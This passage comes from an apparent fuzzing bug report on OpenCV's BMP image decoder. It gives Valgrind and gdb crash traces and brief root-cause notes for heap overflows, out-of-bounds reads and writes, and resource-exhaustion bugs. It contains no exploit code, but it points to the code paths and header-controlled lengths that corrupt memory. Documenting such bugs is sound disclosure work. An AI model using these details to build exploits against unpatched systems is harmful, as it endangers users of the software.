300 | ==24457== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 301 | ==24457== Command: ./opencv_test.elf ../../../fuzz-tests/medianBlur-test/out/crashes/id:000027,sig:06,src:000302,op:flip1,pos:21 302 | ==24457== 303 | ==24457== Warning: set address range perms: large range [0x3a044040, 0xfa0459a8) (undefined) 304 | ==24457== Invalid write of size 1 305 | ==24457== at 0x516949C: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:283) 306 | ==24457== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 307 | ==24457== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 308 | ==24457== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 309 | ==24457== Address 0xfffffffff40458d7 is not stack'd, malloc'd or (recently) free'd 310 | ==24457== 311 | ==24457== 312 | ==24457== Process terminating with default action of signal 11 (SIGSEGV) 313 | ==24457== Access not within mapped region at address 0xFFFFFFFFF40458D7 314 | ==24457== at 0x516949C: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:283) 315 | ==24457== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 316 | ==24457== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 317 | ==24457== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 318 | ==24457== If you believe this happened as a result of a stack 319 | ==24457== overflow in your program's main thread (unlikely but 320 | ==24457== possible), you can try to increase the size of the 321 | ==24457== main thread stack using the --main-stacksize= flag. 322 | ==24457== The main thread stack size used in this run was 8388608. 
323 | ==24457== 324 | ==24457== HEAP SUMMARY: 325 | ==24457== in use at exit: 3,238,106,882 bytes in 397 blocks 326 | ==24457== total heap usage: 458 allocs, 61 frees, 3,238,116,890 bytes allocated 327 | ==24457== 328 | ==24457== LEAK SUMMARY: 329 | ==24457== definitely lost: 0 bytes in 0 blocks 330 | ==24457== indirectly lost: 0 bytes in 0 blocks 331 | ==24457== possibly lost: 3,221,240,139 bytes in 114 blocks 332 | ==24457== still reachable: 16,866,743 bytes in 283 blocks 333 | ==24457== suppressed: 0 bytes in 0 blocks 334 | ==24457== Rerun with --leak-check=full to see details of leaked memory 335 | ==24457== 336 | ==24457== For counts of detected and suppressed errors, rerun with: -v 337 | ==24457== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 338 | Segmentation fault 339 | 340 | ``` 341 | 342 | # 7. out of bound write in FillUniColor 343 | ``` 344 | ==10897== Memcheck, a memory error detector 345 | ==10897== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 
346 | ==10897== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 347 | ==10897== Command: ./opencv_test.elf ../../../fuzz-tests/medianBlur-test/out/crashes/id:000032,sig:06,src:000516,op:flip1,pos:21 348 | ==10897== 349 | ==10897== Warning: set address range perms: large range [0x3a044040, 0xfa0459a8) (undefined) 350 | ==10897== Invalid write of size 1 351 | ==10897== at 0x514C749: FillUniColor(unsigned char*, unsigned char*&, int, int, int&, int, int, PaletteEntry) (utils.cpp:417) 352 | ==10897== by 0x5169824: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:315) 353 | ==10897== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 354 | ==10897== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 355 | ==10897== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 356 | ==10897== Address 0xfffffffff40458d7 is not stack'd, malloc'd or (recently) free'd 357 | ==10897== 358 | ==10897== 359 | ==10897== Process terminating with default action of signal 11 (SIGSEGV) 360 | ==10897== Access not within mapped region at address 0xFFFFFFFFF40458D7 361 | ==10897== at 0x514C749: FillUniColor(unsigned char*, unsigned char*&, int, int, int&, int, int, PaletteEntry) (utils.cpp:417) 362 | ==10897== by 0x5169824: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:315) 363 | ==10897== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 364 | ==10897== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 365 | ==10897== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 366 | ==10897== If you believe this happened as a result of a stack 367 | ==10897== overflow in your program's main thread (unlikely but 368 | ==10897== possible), you can try to increase the size of the 369 | ==10897== main thread stack using the 
--main-stacksize= flag. 370 | ==10897== The main thread stack size used in this run was 8388608. 371 | ==10897== 372 | ==10897== HEAP SUMMARY: 373 | ==10897== in use at exit: 3,238,106,882 bytes in 397 blocks 374 | ==10897== total heap usage: 458 allocs, 61 frees, 3,238,116,890 bytes allocated 375 | ==10897== 376 | ==10897== LEAK SUMMARY: 377 | ==10897== definitely lost: 0 bytes in 0 blocks 378 | ==10897== indirectly lost: 0 bytes in 0 blocks 379 | ==10897== possibly lost: 3,221,240,139 bytes in 114 blocks 380 | ==10897== still reachable: 16,866,743 bytes in 283 blocks 381 | ==10897== suppressed: 0 bytes in 0 blocks 382 | ==10897== Rerun with --leak-check=full to see details of leaked memory 383 | ==10897== 384 | ==10897== For counts of detected and suppressed errors, rerun with: -v 385 | ==10897== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 386 | Segmentation fault 387 | 388 | ``` 389 | 390 | # 8. Invalid read in fread (same heap overflow as #2: RLByteStream::getBytes in BmpDecoder::readHeader) 391 | The first Memcheck report in this run is the same out-of-bounds write as #2 (0 bytes after the 1,264-byte block allocated in BmpDecoder::newDecoder, from the memcpy in RLByteStream::getBytes at bitstrm.cpp:235); the later fread fault is downstream of that corruption. In gdb frame #4 below, getBytes is called with count=0x5d34843e, a header-controlled length far larger than the decoder's buffer, which is the likely root cause. Treat #2 and #8 as one issue when reporting it. 392 | ``` 393 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 394 | [----------------------------------registers-----------------------------------] 395 | RAX: 0x7ffff54a0210 (<__GI__IO_file_xsgetn>: push r14) 396 | RBX: 0x61d5b0 --> 0xc00002574442 397 | RCX: 0xfffffff9 398 | RDX: 0x28 ('(') 399 | RSI: 0x7ffff7ff3fd1 400 | RDI: 0x6155a0 --> 0xc00002574d42 401 | RBP: 0x2f ('/') 402 | RSP: 0x7fffffffdbc8 --> 0x7ffff54a038e (<__GI__IO_file_xsgetn+382>: add QWORD PTR [rbx+0x8],rbp) 403 | RIP: 0x7ffff54b3ab0 (<__mempcpy_sse2+144>: movzx eax,BYTE PTR [rsi]) 404 | R8 : 0x61d690 --> 0x100000001 405 | R9 : 0x6155a0 --> 0xc00002574d42 406 | R10: 0x0 407 | R11: 0x246 408 | R12: 0x7fd1 409 | R13: 0x8000 410 | R14: 0x6155a0 --> 0xc00002574d42 411 | R15: 0x0 412 | EFLAGS: 0x10297 (CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow) 413 | [-------------------------------------code-------------------------------------] 414 | 0x7ffff54b3aa7 <__mempcpy_sse2+135>: lea rdx,[rcx+rdx*1-0x8] 415 | 
0x7ffff54b3aac <__mempcpy_sse2+140>: sub ecx,0x8 416 | 0x7ffff54b3aaf <__mempcpy_sse2+143>: nop 417 | => 0x7ffff54b3ab0 <__mempcpy_sse2+144>: movzx eax,BYTE PTR [rsi] 418 | 0x7ffff54b3ab3 <__mempcpy_sse2+147>: mov BYTE PTR [rdi],al 419 | 0x7ffff54b3ab5 <__mempcpy_sse2+149>: inc ecx 420 | 0x7ffff54b3ab7 <__mempcpy_sse2+151>: lea rsi,[rsi+0x1] 421 | 0x7ffff54b3abb <__mempcpy_sse2+155>: lea rdi,[rdi+0x1] 422 | [------------------------------------stack-------------------------------------] 423 | 0000| 0x7fffffffdbc8 --> 0x7ffff54a038e (<__GI__IO_file_xsgetn+382>: add QWORD PTR [rbx+0x8],rbp) 424 | 0008| 0x7fffffffdbd0 --> 0x61d5b0 --> 0xc00002574442 425 | 0016| 0x7fffffffdbd8 --> 0x8000 426 | 0024| 0x7fffffffdbe0 --> 0x1 427 | 0032| 0x7fffffffdbe8 --> 0x8000 428 | 0040| 0x7fffffffdbf0 --> 0x0 429 | 0048| 0x7fffffffdbf8 --> 0x7ffff549586f (<__GI__IO_fread+143>: test DWORD PTR [rbx],0x8000) 430 | 0056| 0x7fffffffdc00 --> 0x0 431 | [------------------------------------------------------------------------------] 432 | Legend: code, data, rodata, value 433 | Stopped reason: SIGSEGV 434 | __mempcpy_sse2 () at ../sysdeps/x86_64/memcpy.S:166 435 | 166 ../sysdeps/x86_64/memcpy.S: No such file or directory. 
436 | gdb-peda$ bt 437 | #0 __mempcpy_sse2 () at ../sysdeps/x86_64/memcpy.S:166 438 | #1 0x00007ffff54a038e in __GI__IO_file_xsgetn (fp=0x61d5b0, data=, n=0x8000) at fileops.c:1396 439 | #2 0x00007ffff549586f in __GI__IO_fread (buf=, size=0x1, count=0x8000, fp=0x61d5b0) at iofread.c:42 440 | #3 0x00007ffff764c4e3 in cv::RBaseStream::readBlock (this=0x615140) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/bitstrm.cpp:105 441 | #4 0x00007ffff764cf9f in cv::RLByteStream::getBytes (this=0x615140, buffer=0x615180, count=0x5d34843e) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/bitstrm.cpp:233 442 | #5 0x00007ffff763c3b9 in cv::BmpDecoder::readHeader (this=0x6150a0) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/grfmt_bmp.cpp:122 443 | #6 0x00007ffff7608549 in cv::imread_ (filename=..., flags=0x1, hdrtype=0x2, mat=0x7fffffffe240) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/loadsave.cpp:412 444 | #7 0x00007ffff7609742 in cv::imread (filename=..., flags=0x1) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/loadsave.cpp:565 445 | #8 0x0000000000400d91 in main () 446 | #9 0x00007ffff5448f45 in __libc_start_main (main=0x400d2d
, argc=0x2, argv=0x7fffffffe3f8, init=, fini=, rtld_fini=, stack_end=0x7fffffffe3e8) at libc-start.c:287 447 | #10 0x0000000000400c69 in _start () 448 | 449 | ``` 450 | 451 | ``` 452 | ==4831== Memcheck, a memory error detector 453 | ==4831== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 454 | ==4831== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 455 | ==4831== Command: ./opencv_test.elf ../../../fuzz-tests/medianBlur-test/out/crashes/id:000040,sig:06,src:000820,op:havoc,rep:4 456 | ==4831== 457 | ==4831== Invalid write of size 2 458 | ==4831== at 0x4C2F7E3: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 459 | ==4831== by 0x5178F29: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:235) 460 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 461 | ==4831== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 462 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 463 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 464 | ==4831== Address 0xecb66c0 is 0 bytes after a block of size 1,264 alloc'd 465 | ==4831== at 0x4C2B0E0: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 466 | ==4831== by 0x513AD5C: cv::Ptr cv::makePtr() (ptr.inl.hpp:301) 467 | ==4831== by 0x5167CE3: cv::BmpDecoder::newDecoder() const (grfmt_bmp.cpp:76) 468 | ==4831== by 0x51322DB: cv::findDecoder(cv::String const&) (loadsave.cpp:199) 469 | ==4831== by 0x5134301: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:384) 470 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 471 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 472 | ==4831== 473 | ==4831== Invalid write of size 1 474 | ==4831== at 
0x4C2F953: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 475 | ==4831== by 0x5178F29: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:235) 476 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 477 | ==4831== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 478 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 479 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 480 | ==4831== Address 0xecb66e8 is 24 bytes before a block of size 80 alloc'd 481 | ==4831== at 0x4C2AB80: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 482 | ==4831== by 0x68EE88D: cv::fastMalloc(unsigned long) (alloc.cpp:64) 483 | ==4831== by 0x69FE8A7: cv::String::allocate(unsigned long) (stl.cpp:50) 484 | ==4831== by 0x4E4AB37: cv::String::operator=(char const*) (cvstd.hpp:668) 485 | ==4831== by 0x5167A45: cv::BmpDecoder::BmpDecoder() (grfmt_bmp.cpp:55) 486 | ==4831== by 0x513AD79: cv::Ptr cv::makePtr() (ptr.inl.hpp:301) 487 | ==4831== by 0x5167CE3: cv::BmpDecoder::newDecoder() const (grfmt_bmp.cpp:76) 488 | ==4831== by 0x51322DB: cv::findDecoder(cv::String const&) (loadsave.cpp:199) 489 | ==4831== by 0x5134301: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:384) 490 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 491 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 492 | ==4831== 493 | ==4831== Source and destination overlap in memcpy(0xecb67d4, 0xecb67f0, 47) 494 | ==4831== at 0x4C2F71C: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 495 | ==4831== by 0x5178F29: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:235) 496 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 497 | ==4831== 
by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 498 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 499 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 500 | ==4831== 501 | ==4831== Invalid read of size 1 502 | ==4831== at 0x74ADAB0: __GI_mempcpy (memcpy.S:166) 503 | ==4831== by 0x749A38D: _IO_file_xsgetn (fileops.c:1396) 504 | ==4831== by 0x748F86E: fread (iofread.c:42) 505 | ==4831== by 0x51784E2: cv::RBaseStream::readBlock() (bitstrm.cpp:105) 506 | ==4831== by 0x5178F9E: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:233) 507 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 508 | ==4831== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 509 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 510 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 511 | ==4831== Address 0x200040000ffffd1 is not stack'd, malloc'd or (recently) free'd 512 | ==4831== 513 | ==4831== 514 | ==4831== Process terminating with default action of signal 11 (SIGSEGV) 515 | ==4831== General Protection Fault 516 | ==4831== at 0x74ADAB0: __GI_mempcpy (memcpy.S:166) 517 | ==4831== by 0x749A38D: _IO_file_xsgetn (fileops.c:1396) 518 | ==4831== by 0x748F86E: fread (iofread.c:42) 519 | ==4831== by 0x51784E2: cv::RBaseStream::readBlock() (bitstrm.cpp:105) 520 | ==4831== by 0x5178F9E: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:233) 521 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 522 | ==4831== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 523 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 524 | ==4831== by 0x400D90: main (in 
/data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 525 | ==4831== 526 | ==4831== HEAP SUMMARY: 527 | ==4831== in use at exit: 97,526 bytes in 393 blocks 528 | ==4831== total heap usage: 454 allocs, 61 frees, 107,534 bytes allocated 529 | ==4831== 530 | ==4831== LEAK SUMMARY: 531 | ==4831== definitely lost: 0 bytes in 0 blocks 532 | ==4831== indirectly lost: 0 bytes in 0 blocks 533 | ==4831== possibly lost: 8,163 bytes in 113 blocks 534 | ==4831== still reachable: 89,363 bytes in 280 blocks 535 | ==4831== suppressed: 0 bytes in 0 blocks 536 | ==4831== Rerun with --leak-check=full to see details of leaked memory 537 | ==4831== 538 | ==4831== For counts of detected and suppressed errors, rerun with: -v 539 | ==4831== ERROR SUMMARY: 259 errors from 4 contexts (suppressed: 0 from 0) 540 | Segmentation fault 541 | 542 | ``` 543 | 544 | # 9. Heap-based out-of-bounds read in icvCvt_BGRA2BGR_8u_C4C3R 545 | The Memcheck output below reports invalid *reads* of size 1 (0, 1 and 2 bytes past the end of a 16,416-byte block allocated with new[] in BmpDecoder::readData) inside icvCvt_BGRA2BGR_8u_C4C3R, repeated until an unmapped address (0xE2E0001) is hit; it is an over-read of the row buffer, not an invalid write. The ~3 million reported errors suggest the conversion loop runs far beyond the buffer, i.e. the row length handed to the converter is larger than the buffer that was allocated for it. 546 | ``` 547 | ==2971== Memcheck, a memory error detector 548 | ==2971== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 
549 | ==2971== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 550 | ==2971== Command: ../../../../OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf id:000038,sig:06,src:000475,op:flip1,pos:21 551 | ==2971== 552 | ==2971== Warning: set address range perms: large range [0x3a044040, 0x1ba074088) (undefined) 553 | ==2971== Invalid read of size 1 554 | ==2971== at 0x506A270: icvCvt_BGRA2BGR_8u_C4C3R(unsigned char const*, int, unsigned char*, int, CvSize, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 555 | ==2971== by 0x507D7A8: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 556 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 557 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 558 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 559 | ==2971== Address 0xdf05b91 is 1 bytes after a block of size 16,416 alloc'd 560 | ==2971== at 0x4C2B800: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 561 | ==2971== by 0x507DD8C: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 562 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 563 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 564 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 565 | ==2971== 566 | 
==2971== Invalid read of size 1 567 | ==2971== at 0x506A276: icvCvt_BGRA2BGR_8u_C4C3R(unsigned char const*, int, unsigned char*, int, CvSize, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 568 | ==2971== by 0x507D7A8: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 569 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 570 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 571 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 572 | ==2971== Address 0xdf05b90 is 0 bytes after a block of size 16,416 alloc'd 573 | ==2971== at 0x4C2B800: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 574 | ==2971== by 0x507DD8C: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 575 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 576 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 577 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 578 | ==2971== 579 | ==2971== Invalid read of size 1 580 | ==2971== at 0x506A290: icvCvt_BGRA2BGR_8u_C4C3R(unsigned char const*, int, unsigned char*, int, CvSize, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 581 | ==2971== by 0x507D7A8: cv::BmpDecoder::readData(cv::Mat&) (in 
/data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 582 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 583 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 584 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 585 | ==2971== Address 0xdf05b92 is 2 bytes after a block of size 16,416 alloc'd 586 | ==2971== at 0x4C2B800: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 587 | ==2971== by 0x507DD8C: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 588 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 589 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 590 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 591 | ==2971== 592 | ==2971== 593 | ==2971== Process terminating with default action of signal 11 (SIGSEGV) 594 | ==2971== Access not within mapped region at address 0xE2E0001 595 | ==2971== at 0x506A270: icvCvt_BGRA2BGR_8u_C4C3R(unsigned char const*, int, unsigned char*, int, CvSize, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 596 | ==2971== by 0x507D7A8: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 597 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 598 | 
==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 599 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 600 | ==2971== If you believe this happened as a result of a stack 601 | ==2971== overflow in your program's main thread (unlikely but 602 | ==2971== possible), you can try to increase the size of the 603 | ==2971== main thread stack using the --main-stacksize= flag. 604 | ==2971== The main thread stack size used in this run was 8388608. 605 | ==2971== 606 | ==2971== HEAP SUMMARY: 607 | ==2971== in use at exit: 6,442,761,614 bytes in 397 blocks 608 | ==2971== total heap usage: 458 allocs, 61 frees, 6,442,771,622 bytes allocated 609 | ==2971== 610 | ==2971== LEAK SUMMARY: 611 | ==2971== definitely lost: 0 bytes in 0 blocks 612 | ==2971== indirectly lost: 0 bytes in 0 blocks 613 | ==2971== possibly lost: 6,442,655,739 bytes in 114 blocks 614 | ==2971== still reachable: 105,875 bytes in 283 blocks 615 | ==2971== suppressed: 0 bytes in 0 blocks 616 | ==2971== Rerun with --leak-check=full to see details of leaked memory 617 | ==2971== 618 | ==2971== For counts of detected and suppressed errors, rerun with: -v 619 | ==2971== ERROR SUMMARY: 3029845 errors from 3 contexts (suppressed: 0 from 0) 620 | Segmentation fault 621 | 622 | ``` 623 | ![](./pics/bug8.PNG) 624 | 625 | 626 | # 10. DOS (CPU exhaust ) 627 | 628 | the bug results cpu exhaust for a long time. 629 | 630 | # 11. DOS (memory exhaust) 631 | 632 | This bug results to memory exhaust. 633 | 634 | ![](./pics/dos.PNG) 635 | 636 | 637 | # 12. out-of-bound write in FillColorRow1 638 | 639 | ``` 640 | ==16048== Memcheck, a memory error detector 641 | ==16048== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 
642 | ==16048== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 643 | ==16048== Command: ./opencv_test.elf ./12-opencv-outbound-write-FillColorRow1 644 | ==16048== 645 | ==16048== Warning: set address range perms: large range [0x3a044080, 0xccce9780) (undefined) 646 | ==16048== Invalid write of size 4 647 | ==16048== at 0x50AD680: FillColorRow1(unsigned char*, unsigned char*, int, PaletteEntry*) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 648 | ==16048== by 0x50BCB10: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 649 | ==16048== by 0x50A384C: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 650 | ==16048== by 0x50A3DB4: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 651 | ==16048== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 652 | ==16048== Address 0xffffffffccce04c8 is not stack'd, malloc'd or (recently) free'd 653 | ==16048== 654 | ==16048== 655 | ==16048== Process terminating with default action of signal 11 (SIGSEGV) 656 | ==16048== Access not within mapped region at address 0xFFFFFFFFCCCE04C8 657 | ==16048== at 0x50AD680: FillColorRow1(unsigned char*, unsigned char*, int, PaletteEntry*) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 658 | ==16048== by 0x50BCB10: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 659 | ==16048== by 0x50A384C: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 660 | ==16048== by 0x50A3DB4: cv::imread(cv::String const&, int) (in 
